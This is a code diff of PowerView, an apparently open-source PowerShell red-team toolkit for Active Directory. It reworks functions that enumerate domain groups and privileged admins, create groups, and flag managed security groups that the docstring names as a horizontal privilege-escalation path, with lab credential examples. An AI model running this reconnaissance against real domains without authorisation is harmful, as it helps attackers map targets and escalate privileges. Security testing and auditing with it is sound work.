+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSID -Credential $Cred
+
+.OUTPUTS
+
+String
+
+A string representing the specified domain SID.
#>
- param(
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType([String])]
+ [CmdletBinding()]
+ Param(
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $DomainController
+ $Server,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- $DCSID = Get-NetComputer -Domain $Domain -DomainController $DomainController -FullData -Filter '(userAccountControl:1.2.840.113556.1.4.803:=8192)' | Select-Object -First 1 -ExpandProperty objectsid
- if($DCSID) {
- $DCSID.Substring(0, $DCSID.LastIndexOf('-'))
+ $SearcherArguments = @{
+ 'LDAPFilter' = '(userAccountControl:1.2.840.113556.1.4.803:=8192)'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+ $DCSID = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1 -ExpandProperty objectsid
+
+ if ($DCSID) {
+ $DCSID.SubString(0, $DCSID.LastIndexOf('-'))
}
else {
- Write-Verbose "Error extracting domain SID for $Domain"
+ Write-Verbose "[Get-DomainSID] Error extracting domain SID for '$Domain'"
}
}
-function Get-NetGroup {
+function Get-DomainGroup {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Return all groups or specific group objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty
+
+.DESCRIPTION
+
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties samaccountname,usnchanged,...". By default, all group objects for
+the current domain are returned. To return the groups a specific user/group is
+a part of, use -MemberIdentity X to execute token groups enumeration.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to query for. Wildcards accepted.
+
+.PARAMETER MemberIdentity
+
+A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the user/group member to query for group membership.
+
+.PARAMETER AdminCount
+
+Switch. Return users with '(adminCount=1)' (meaning are/were privileged).
+
+.PARAMETER GroupScope
+
+Specifies the scope (DomainLocal, Global, or Universal) of the group(s) to search for.
+Also accepts NotDomainLocal, NotGloba, and NotUniversal as negations.
+
+.PARAMETER GroupProperty
+
+Specifies a specific property to search for when performing the group search.
+Possible values are Security, Distribution, CreatedBySystem, and NotCreatedBySystem.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER Properties
+
+Specifies the properties of the output object to retrieve from the server.
- Gets a list of all current groups in a domain, or all
- the groups a given user/group object belongs to.
+.PARAMETER SearchBase
- .PARAMETER GroupName
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- The group name to query for, wildcards accepted.
+.PARAMETER Server
- .PARAMETER SID
+Specifies an Active Directory server (domain controller) to bind to.
- The group SID to query for.
+.PARAMETER SearchScope
- .PARAMETER UserName
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- The user name (or group name) to query for all effective
- groups of.
+.PARAMETER ResultPageSize
- .PARAMETER Filter
+Specifies the PageSize to set for the LDAP searcher object.
- A customized ldap filter string to use, e.g. "(description=*admin*)"
+.PARAMETER ServerTimeLimit
- .PARAMETER Domain
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- The domain to query for groups, defaults to the current domain.
+.PARAMETER SecurityMasks
- .PARAMETER DomainController
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
- Domain controller to reflect LDAP queries through.
+.PARAMETER Tombstone
- .PARAMETER ADSpath
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+.PARAMETER FindOne
- .PARAMETER AdminCount
+Only return one result object.
- Switch. Return group with adminCount=1.
+.PARAMETER Credential
- .PARAMETER FullData
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- Switch. Return full group objects instead of just object names (the default).
+.PARAMETER Raw
- .PARAMETER RawSids
+Switch. Return raw results instead of translating the fields into a custom PSObject.
- Switch. Return raw SIDs when using "Get-NetGroup -UserName X"
+.EXAMPLE
- .PARAMETER PageSize
+Get-DomainGroup | select samaccountname
- The PageSize to set for the LDAP searcher object.
+samaccountname
+--------------
+WinRMRemoteWMIUsers__
+Administrators
+Users
+Guests
+Print Operators
+Backup Operators
+...
- .PARAMETER Credential
+.EXAMPLE
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+Get-DomainGroup *admin* | select distinguishedname
- .PARAMETER AllTypes
+distinguishedname
+-----------------
+CN=Administrators,CN=Builtin,DC=testlab,DC=local
+CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local
+CN=Schema Admins,CN=Users,DC=testlab,DC=local
+CN=Enterprise Admins,CN=Users,DC=testlab,DC=local
+CN=Domain Admins,CN=Users,DC=testlab,DC=local
+CN=DnsAdmins,CN=Users,DC=testlab,DC=local
+CN=Server Admins,CN=Users,DC=testlab,DC=local
+CN=Desktop Admins,CN=Users,DC=testlab,DC=local
- By default we will retrieve only Security, not Distribution Groups.
+.EXAMPLE
- .EXAMPLE
+Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl
- PS C:\> Get-NetGroup
+samaccountname
+--------------
+Server Admins
- Returns the current security groups in the domain.
+.EXAMPLE
- .EXAMPLE
+'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose
+VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local
+VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local)))
- PS C:\> Get-NetGroup -GroupName *admin*
+usncreated : 13245
+grouptype : -2147483646
+samaccounttype : 268435456
+samaccountname : Desktop Admins
+whenchanged : 8/10/2016 12:30:30 AM
+objectsid : S-1-5-21-890171859-3433809279-3366196753-1118
+objectclass : {top, group}
+cn : Desktop Admins
+usnchanged : 13255
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+name : Desktop Admins
+distinguishedname : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+member : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+whencreated : 8/10/2016 12:29:43 AM
+instancetype : 4
+objectguid : f37903ed-b333-49f4-abaa-46c65e9cca71
+objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local
- Returns all groups with "admin" in their group name.
+.EXAMPLE
- .EXAMPLE
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGroup -Credential $Cred
- PS C:\> Get-NetGroup -Domain testing -FullData
+.EXAMPLE
- Returns full group data objects in the 'testing' domain
+Get-Domain | Select-Object -Expand name
+testlab.local
+
+'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainGroup] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainGroup] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins)))
+
+distinguishedname
+-----------------
+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+
+.OUTPUTS
+
+PowerView.Group
+
+Custom PSObject with translated group property fields.
#>
- [CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
- [String]
- $GroupName = '*',
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [OutputType('PowerView.Group')]
+ [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+ [String[]]
+ $Identity,
+ [ValidateNotNullOrEmpty()]
+ [Alias('UserName')]
[String]
- $SID,
+ $MemberIdentity,
+
+ [Switch]
+ $AdminCount,
+ [ValidateSet('DomainLocal', 'NotDomainLocal', 'Global', 'NotGlobal', 'Universal', 'NotUniversal')]
+ [Alias('Scope')]
[String]
- $UserName,
+ $GroupScope,
+ [ValidateSet('Security', 'Distribution', 'CreatedBySystem', 'NotCreatedBySystem')]
[String]
- $Filter,
+ $GroupProperty,
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $DomainController,
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $ADSpath,
+ $SearchBase,
- [Switch]
- $AdminCount,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
- [Switch]
- $FullData,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
- [Switch]
- $RawSids,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
[Switch]
- $AllTypes,
+ $Tombstone,
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200,
+ [Alias('ReturnOne')]
+ [Switch]
+ $FindOne,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
)
- begin {
- $GroupSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
- if (!$AllTypes)
- {
- $Filter += "(groupType:1.2.840.113556.1.4.803:=2147483648)"
- }
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $GroupSearcher = Get-DomainSearcher @SearcherArguments
}
- process {
- if($GroupSearcher) {
+ PROCESS {
+ if ($GroupSearcher) {
+ if ($PSBoundParameters['MemberIdentity']) {
- if($AdminCount) {
- Write-Verbose "Checking for adminCount=1"
- $Filter += "(admincount=1)"
- }
+ if ($SearcherArguments['Properties']) {
+ $OldProperties = $SearcherArguments['Properties']
+ }
- if ($UserName) {
- # get the raw user object
- $User = Get-ADObject -SamAccountName $UserName -Domain $Domain -DomainController $DomainController -Credential $Credential -ReturnRaw -PageSize $PageSize | Select-Object -First 1
+ $SearcherArguments['Identity'] = $MemberIdentity
+ $SearcherArguments['Raw'] = $True
- if($User) {
- # convert the user to a directory entry
- $UserDirectoryEntry = $User.GetDirectoryEntry()
+ Get-DomainObject @SearcherArguments | ForEach-Object {
+ # convert the user/group to a directory entry
+ $ObjectDirectoryEntry = $_.GetDirectoryEntry()
- # cause the cache to calculate the token groups for the user
- $UserDirectoryEntry.RefreshCache("tokenGroups")
+ # cause the cache to calculate the token groups for the user/group
+ $ObjectDirectoryEntry.RefreshCache('tokenGroups')
- $UserDirectoryEntry.TokenGroups | ForEach-Object {
+ $ObjectDirectoryEntry.TokenGroups | ForEach-Object {
# convert the token group sid
$GroupSid = (New-Object System.Security.Principal.SecurityIdentifier($_,0)).Value
# ignore the built in groups
- if($GroupSid -notmatch '^S-1-5-32-.*') {
- if($FullData) {
- $Group = Get-ADObject -SID $GroupSid -PageSize $PageSize -Domain $Domain -DomainController $DomainController -Credential $Credential
- $Group.PSObject.TypeNames.Add('PowerView.Group')
+ if ($GroupSid -notmatch '^S-1-5-32-.*') {
+ $SearcherArguments['Identity'] = $GroupSid
+ $SearcherArguments['Raw'] = $False
+ if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties }
+ $Group = Get-DomainObject @SearcherArguments
+ if ($Group) {
+ $Group.PSObject.TypeNames.Insert(0, 'PowerView.Group')
$Group
}
- else {
- if($RawSids) {
- $GroupSid
- }
- else {
- Convert-SidToName -SID $GroupSid
- }
- }
}
}
}
- else {
- Write-Warning "UserName '$UserName' failed to resolve."
- }
}
else {
- if ($SID) {
- $GroupSearcher.filter = "(&(objectCategory=group)(objectSID=$SID)$Filter)"
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^S-1-') {
+ $IdentityFilter += "(objectsid=$IdentityInstance)"
+ }
+ elseif ($IdentityInstance -match '^CN=') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainGroup] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $GroupSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $GroupSearcher) {
+ Write-Warning "[Get-DomainGroup] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
+ }
+ }
+ elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+ $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ elseif ($IdentityInstance.Contains('\')) {
+ $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
+ if ($ConvertedIdentityInstance) {
+ $GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
+ $GroupName = $IdentityInstance.Split('\')[1]
+ $IdentityFilter += "(samAccountName=$GroupName)"
+ $SearcherArguments['Domain'] = $GroupDomain
+ Write-Verbose "[Get-DomainGroup] Extracted domain '$GroupDomain' from '$IdentityInstance'"
+ $GroupSearcher = Get-DomainSearcher @SearcherArguments
+ }
+ }
+ else {
+ $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance))"
+ }
}
- else {
- $GroupSearcher.filter = "(&(objectCategory=group)(samaccountname=$GroupName)$Filter)"
+
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
+ }
+
+ if ($PSBoundParameters['AdminCount']) {
+ Write-Verbose '[Get-DomainGroup] Searching for adminCount=1'
+ $Filter += '(admincount=1)'
+ }
+ if ($PSBoundParameters['GroupScope']) {
+ $GroupScopeValue = $PSBoundParameters['GroupScope']
+ $Filter = Switch ($GroupScopeValue) {
+ 'DomainLocal' { '(groupType:1.2.840.113556.1.4.803:=4)' }
+ 'NotDomainLocal' { '(!(groupType:1.2.840.113556.1.4.803:=4))' }
+ 'Global' { '(groupType:1.2.840.113556.1.4.803:=2)' }
+ 'NotGlobal' { '(!(groupType:1.2.840.113556.1.4.803:=2))' }
+ 'Universal' { '(groupType:1.2.840.113556.1.4.803:=8)' }
+ 'NotUniversal' { '(!(groupType:1.2.840.113556.1.4.803:=8))' }
+ }
+ Write-Verbose "[Get-DomainGroup] Searching for group scope '$GroupScopeValue'"
+ }
+ if ($PSBoundParameters['GroupProperty']) {
+ $GroupPropertyValue = $PSBoundParameters['GroupProperty']
+ $Filter = Switch ($GroupPropertyValue) {
+ 'Security' { '(groupType:1.2.840.113556.1.4.803:=2147483648)' }
+ 'Distribution' { '(!(groupType:1.2.840.113556.1.4.803:=2147483648))' }
+ 'CreatedBySystem' { '(groupType:1.2.840.113556.1.4.803:=1)' }
+ 'NotCreatedBySystem' { '(!(groupType:1.2.840.113556.1.4.803:=1))' }
+ }
+ Write-Verbose "[Get-DomainGroup] Searching for group property '$GroupPropertyValue'"
+ }
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainGroup] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
}
- $Results = $GroupSearcher.FindAll()
+ $GroupSearcher.filter = "(&(objectCategory=group)$Filter)"
+ Write-Verbose "[Get-DomainGroup] filter string: $($GroupSearcher.filter)"
+
+ if ($PSBoundParameters['FindOne']) { $Results = $GroupSearcher.FindOne() }
+ else { $Results = $GroupSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
- # if we're returning full data objects
- if ($FullData) {
- # convert/process the LDAP fields for each result
- $Group = Convert-LDAPProperty -Properties $_.Properties
- $Group.PSObject.TypeNames.Add('PowerView.Group')
- $Group
+ if ($PSBoundParameters['Raw']) {
+ # return raw result objects
+ $Group = $_
}
else {
- # otherwise we're just returning the group name
- $_.properties.samaccountname
+ $Group = Convert-LDAPProperty -Properties $_.Properties
+ }
+ $Group.PSObject.TypeNames.Insert(0, 'PowerView.Group')
+ $Group
+ }
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainGroup] Error disposing of the Results object"
}
}
- $Results.dispose()
$GroupSearcher.dispose()
}
}
@@ -5255,208 +10166,742 @@ function Get-NetGroup {
}
-function Get-NetGroupMember {
+function New-DomainGroup {
<#
- .SYNOPSIS
+.SYNOPSIS
- This function users [ADSI] and LDAP to query the current AD context
- or trusted domain for users in a specified group. If no GroupName is
- specified, it defaults to querying the "Domain Admins" group.
- This is a replacement for "net group 'name' /domain"
+Creates a new domain group (assuming appropriate permissions) and returns the group object.
- .PARAMETER GroupName
+TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
- The group name to query for users.
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
- .PARAMETER SID
+.DESCRIPTION
- The Group SID to query for users. If not given, it defaults to 512 "Domain Admins"
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to create a new
+DirectoryServices.AccountManagement.GroupPrincipal with the specified
+group properties.
- .PARAMETER Filter
+.PARAMETER SamAccountName
- A customized ldap filter string to use, e.g. "(description=*admin*)"
+Specifies the Security Account Manager (SAM) account name of the group to create.
+Maximum of 256 characters. Mandatory.
- .PARAMETER Domain
+.PARAMETER Name
- The domain to query for group users, defaults to the current domain.
+Specifies the name of the group to create. If not provided, defaults to SamAccountName.
- .PARAMETER DomainController
+.PARAMETER DisplayName
- Domain controller to reflect LDAP queries through.
+Specifies the display name of the group to create. If not provided, defaults to SamAccountName.
- .PARAMETER ADSpath
+.PARAMETER Description
- The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+Specifies the description of the group to create.
- .PARAMETER FullData
+.PARAMETER Domain
- Switch. Returns full data objects instead of just group/users.
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
- .PARAMETER Recurse
+.PARAMETER Credential
- Switch. If the group member is a group, recursively try to query its members as well.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- .PARAMETER UseMatchingRule
+.EXAMPLE
- Switch. Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query when -Recurse is specified.
- Much faster than manual recursion, but doesn't reveal cross-domain groups.
+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.'
- .PARAMETER PageSize
+Creates the 'TestGroup' group with the specified description.
- The PageSize to set for the LDAP searcher object.
+.EXAMPLE
- .PARAMETER Credential
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+Creates the 'TestGroup' group with the specified description using the specified alternate credentials.
- .EXAMPLE
+.OUTPUTS
- PS C:\> Get-NetGroupMember
-
- Returns the usernames that of members of the "Domain Admins" domain group.
-
- .EXAMPLE
-
- PS C:\> Get-NetGroupMember -Domain testing -GroupName "Power Users"
-
- Returns the usernames that of members of the "Power Users" group in the 'testing' domain.
+DirectoryServices.AccountManagement.GroupPrincipal
+#>
- .LINK
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('DirectoryServices.AccountManagement.GroupPrincipal')]
+ Param(
+ [Parameter(Mandatory = $True)]
+ [ValidateLength(0, 256)]
+ [String]
+ $SamAccountName,
- http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/
-#>
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Name,
- [CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
+ [ValidateNotNullOrEmpty()]
[String]
- $GroupName,
+ $DisplayName,
+ [ValidateNotNullOrEmpty()]
[String]
- $SID,
+ $Description,
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ $ContextArguments = @{
+ 'Identity' = $SamAccountName
+ }
+ if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
+ $Context = Get-PrincipalContext @ContextArguments
+
+ if ($Context) {
+ $Group = New-Object -TypeName System.DirectoryServices.AccountManagement.GroupPrincipal -ArgumentList ($Context.Context)
+
+ # set all the appropriate group parameters
+ $Group.SamAccountName = $Context.Identity
+
+ if ($PSBoundParameters['Name']) {
+ $Group.Name = $Name
+ }
+ else {
+ $Group.Name = $Context.Identity
+ }
+ if ($PSBoundParameters['DisplayName']) {
+ $Group.DisplayName = $DisplayName
+ }
+ else {
+ $Group.DisplayName = $Context.Identity
+ }
+
+ if ($PSBoundParameters['Description']) {
+ $Group.Description = $Description
+ }
+
+ Write-Verbose "[New-DomainGroup] Attempting to create group '$SamAccountName'"
+ try {
+ $Null = $Group.Save()
+ Write-Verbose "[New-DomainGroup] Group '$SamAccountName' successfully created"
+ $Group
+ }
+ catch {
+ Write-Warning "[New-DomainGroup] Error creating group '$SamAccountName' : $_"
+ }
+ }
+}
+
+
+function Get-DomainManagedSecurityGroup {
+<#
+.SYNOPSIS
+
+Returns all security groups in the current (or target) domain that have a manager set.
+
+Author: Stuart Morgan (@ukstufus) <stuart.morgan@mwrinfosecurity.com>, Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl
+
+.DESCRIPTION
+
+Authority to manipulate the group membership of AD security groups and distribution groups
+can be delegated to non-administrators by setting the 'managedBy' attribute. This is typically
+used to delegate management authority to distribution groups, but Windows supports security groups
+being managed in the same way.
+
+This function searches for AD groups which have a group manager set, and determines whether that
+user can manipulate group membership. This could be a useful method of horizontal privilege
+escalation, especially if the manager can manipulate the membership of a privileged group.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv
+
+Store a list of all security groups with managers in group-managers.csv
+
+.OUTPUTS
+
+PowerView.ManagedSecurityGroup
+
+A custom PSObject describing the managed security group.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.ManagedSecurityGroup')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Name')]
+ [ValidateNotNullOrEmpty()]
[String]
- $DomainController,
+ $Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $ADSpath,
+ $SearchBase,
- [Switch]
- $FullData,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
- [Switch]
- $Recurse,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
- [Switch]
- $UseMatchingRule,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- [ValidateRange(1,10000)]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- begin {
- if($DomainController) {
- $TargetDomainController = $DomainController
- }
- else {
- $TargetDomainController = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name
- }
+ BEGIN {
+ $SearcherArguments = @{
+ 'LDAPFilter' = '(&(managedBy=*)(groupType:1.2.840.113556.1.4.803:=2147483648))'
+ 'Properties' = 'distinguishedName,managedBy,samaccounttype,samaccountname'
+ }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ }
- if($Domain) {
+ PROCESS {
+ if ($PSBoundParameters['Domain']) {
+ $SearcherArguments['Domain'] = $Domain
$TargetDomain = $Domain
}
else {
- $TargetDomain = Get-NetDomain -Credential $Credential | Select-Object -ExpandProperty name
+ $TargetDomain = $Env:USERDNSDOMAIN
+ }
+
+ # go through the list of security groups on the domain and identify those who have a manager
+ Get-DomainGroup @SearcherArguments | ForEach-Object {
+ $SearcherArguments['Properties'] = 'distinguishedname,name,samaccounttype,samaccountname,objectsid'
+ $SearcherArguments['Identity'] = $_.managedBy
+ $Null = $SearcherArguments.Remove('LDAPFilter')
+
+ # $SearcherArguments
+ # retrieve the object that the managedBy DN refers to
+ $GroupManager = Get-DomainObject @SearcherArguments
